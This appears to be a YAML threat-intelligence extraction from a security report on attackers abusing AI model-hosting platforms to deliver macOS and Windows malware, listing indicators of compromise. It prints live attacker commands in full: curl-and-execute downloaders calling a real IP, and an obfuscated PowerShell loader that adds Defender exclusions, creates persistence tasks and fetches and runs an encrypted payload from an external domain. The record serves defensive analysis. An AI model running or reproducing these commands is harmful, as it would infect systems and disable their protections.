# Failed YAML extraction
# Timestamp: 2026-05-01T16:27:46.535517
# Response length: 5725 chars
# Input chunk preview: '=== ARTICLE BODY ===Authors: Darrel Virtusio, Subhajeet Singha, Syed AizadSummary- Acronis TRU uncovered active abuse of AI platforms like Hugging Face and ClawHub for malware delivery, where attacker'
# ============================================================

title: "Acronis TRU Uncovered Active Abuse of AI Platforms for Malware Delivery"
description: Acronis TRU uncovered active abuse of AI platforms like Hugging Face and ClawHub for malware delivery, targeting both Windows and macOS with payloads including trojans, cryptominers, and AMOS stealer.
attribution: ""
malware_families: []
cves: []
ttps:
  processes:
    - powershell.exe
  command_lines:
    - "/bin/bash -c \"$(curl -fsSL hxxp://91.92.242[.]30/6wioz8285kcbax6v)\""
    - "cd $TMPDIR && curl -O hxxp://91.92.242[.]30/1v07y9e1m6v7thl6 && xattr -c 1v07y9e1m6v7thl6 && chmod +x 1v07y9e1m6v7thl6 && ./1v07y9e1m6v7thl6"
    - "Start-Process gpupdate -ArgumentList '/force','/target:computer' -WindowStyle Hidden -Wait 2>$null"
    - "schtasks /create /tn ('WindowsSystemService') /tr ($p1 + (-join('\','svchost.exe'))) /sc onlogon /rl highest /f 2>$null"
    - "schtasks /create /tn ('RuntimeBrokerService') /tr ($p2t + '\RuntimeBroker.exe -Embedding') /sc onlogon /rl highest /f 2>$null"
    - "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$iv=New-Object byte[] 16;[Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($iv);$aes=[Security.Cryptography.Aes]::Create();$aes.Key=[Text.Encoding]::UTF8.GetBytes(('41712961294911411673089167339901'));$aes.IV=$iv;$aes.Mode=(-join('CBC'));$aes.Padding=('PKCS7');$cmd=[Text.Encoding]::UTF8.GetBytes((-join('getPayload')));$encCmd=$aes.CreateEncryptor().TransformFinalBlock($cmd,0,$cmd.Length);$body=New-Object byte[] ($iv.Length+$encCmd.Length);[Array]::Copy($iv,$body,16);[Array]::Copy($encCmd,0,$body,16,$encCmd.Length);$wc=New-Object Net.WebClient;$wc.Headers.Add((-join('Content-Type')),('application/octet-stream'));$data=$wc.UploadData('https://velvet-parrot.com:443',$body);$riv=[byte[]]$data[0..15];$enc=[byte[]]$data[16..($data.Length-1)];$aes.IV=$riv;$dec=$aes.CreateDecryptor().TransformFinalBlock($enc,0,$enc.Length);[IO.File]::WriteAllBytes(($p1 + ('\svchost.exe')),$dec);Copy-Item ($p1 + ('\svchost.exe')) \"$p2t\RuntimeBroker.exe\" -Force;Start-Process ($p1 + ('\svchost.exe')) -WindowStyle Hidden"
  powershell:
    - "$la=$env:LOCALAPPDATA;$p1=($la + ('\'+'Microsof'+'t\Office'+'B'+'rok'+'e'+'r'));$p2=($la + ('\Packa'+'ges\M'+'icr'+'osof'+'t.Wi'+'n'+'dows.Peo'+'pleE'+'x'+'p'+'erience'+'Host_gw'+'1n1c2fh'+'ye'+'q'+'y'));$p2t=($p2 + (-join('\AC','\Te','mp')));New-Item -Path $p1 -ItemType Directory -Force|Out-Null;New-Item -Path $p2t -ItemType Directory -Force|Out-Null;attrib +h +s $p1;attrib +h +s $p2;reg add (-join('HK','LM','\S','OFTWARE\','Poli','cie','s\Micro','soft\W','indo','ws Defen','der\Exc','lus','ions\Pa','t','hs')) /f /reg:64;reg add (-join('H','KLM\SOFT','WARE','\Polic','ies\Micr','osoft\','Wind','ows De','fende','r','\Exclusi','ons','\Paths')) /v $p1 /t REG_DWORD /d 0 /f /reg:64;reg add (-join('HKLM\SOF','TW','ARE\P','olicies\','Micros','oft\Wind','ows De','fend','er','\Exclusi','ons','\Paths')) /v $p2 /t REG_DWORD /d 0 /f /reg:64;try{Add-MpPreference -ExclusionPath $p1 -Force -ErrorAction SilentlyContinue;Add-MpPreference -ExclusionPath $p2 -Force -ErrorAction SilentlyContinue;}catch{}Start-Process gpupdate -ArgumentList '/force','/target:computer' -WindowStyle Hidden -Wait 2>$null;Start-Sleep -Seconds 20;schtasks /create /tn ('Windows'+'S'+'ystemSe'+'rvice') /tr ($p1 + (-join('\','svch','ost.e','xe'))) /sc onlogon /rl highest /f 2>$null;schtasks /create /tn ('Runt'+'imeBrok'+'e'+'rSe'+'rvi'+'c'+'e') /tr ($p2t + '\RuntimeBroker.exe -Embedding') /sc onlogon /rl highest /f 2>$null;[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$iv=New-Object byte[] 16;[Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($iv);$aes=[Security.Cryptography.Aes]::Create();$aes.Key=[Text.Encoding]::UTF8.GetBytes(('4171'+'29612949'+'11411673'+'08'+'91673399'+'01'));$aes.IV=$iv;$aes.Mode=(-join('CB','C'));$aes.Padding=('PK'+'CS'+'7');$cmd=[Text.Encoding]::UTF8.GetBytes((-join('ge','tP','aylo','a','d')));$encCmd=$aes.CreateEncryptor().TransformFinalBlock($cmd,0,$cmd.Length);$body=New-Object byte[] ($iv.Length+$encCmd.Length);[Array]::Copy($iv,$body,16);[Array]::Copy($encCmd,0,$body,16,$encCmd.Length);$wc=New-Object Net.WebClient;$wc.Headers.Add((-join('C','onten','t-Ty','pe')),('app'+'lic'+'ation'+'/octet-s'+'tre'+'am'));$data=$wc.UploadData('https://velvet-parrot.com:443',$body);$riv=[byte[]]$data[0..15];$enc=[byte[]]$data[16..($data.Length-1)];$aes.IV=$riv;$dec=$aes.CreateDecryptor().TransformFinalBlock($enc,0,$enc.Length);[IO.File]::WriteAllBytes(($p1 + ('\svc'+'host.e'+'xe')),$dec);Copy-Item ($p1 + ('\s'+'vcho'+'s'+'t.e'+'x'+'e')) \"$p2t\RuntimeBroker.exe\" -Force;Start-Process ($p1 + ('\svc'+'host.e'+'xe')) -WindowStyle Hidden"
  scripts: []
  registry_keys:
    - HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths
  image_loads: []
  network_connections:
    - powershell.exe -> velvet-parrot.com:443
  file_activity:
    - $TMPDIR/1v07y9e1m6v7thl6
    - %APPDATA%/Microsoft/OfficeBroker/svchost.exe
    - %APPDATA%/Packages/Microsoft.Windows.PeopleExperienceHost_gw1n1c2fhyeqy/AC/Temp/RuntimeBroker.exe
  persistence:
    - Registry Run key (HKLM) pointing to svchost.exe in %APPDATA%
    - Scheduled tasks for WindowsSystemService and RuntimeBrokerService
  process_relations: []
iocs:
  hashes: []
  ip_addresses:
    - 91.92.242[.]30
  domains:
    - install[.]app-distribution[.]net
    - velvet-parrot.com
  urls:
    - hxxp://91.92.242[.]30/6wioz8285kcbax6v
    - hxxp://91.92.242[.]30/1v07y9e1m6v7thl6
authors:
  - Darrel Virtusio
  - Subhajeet Singha
  - Syed Aizad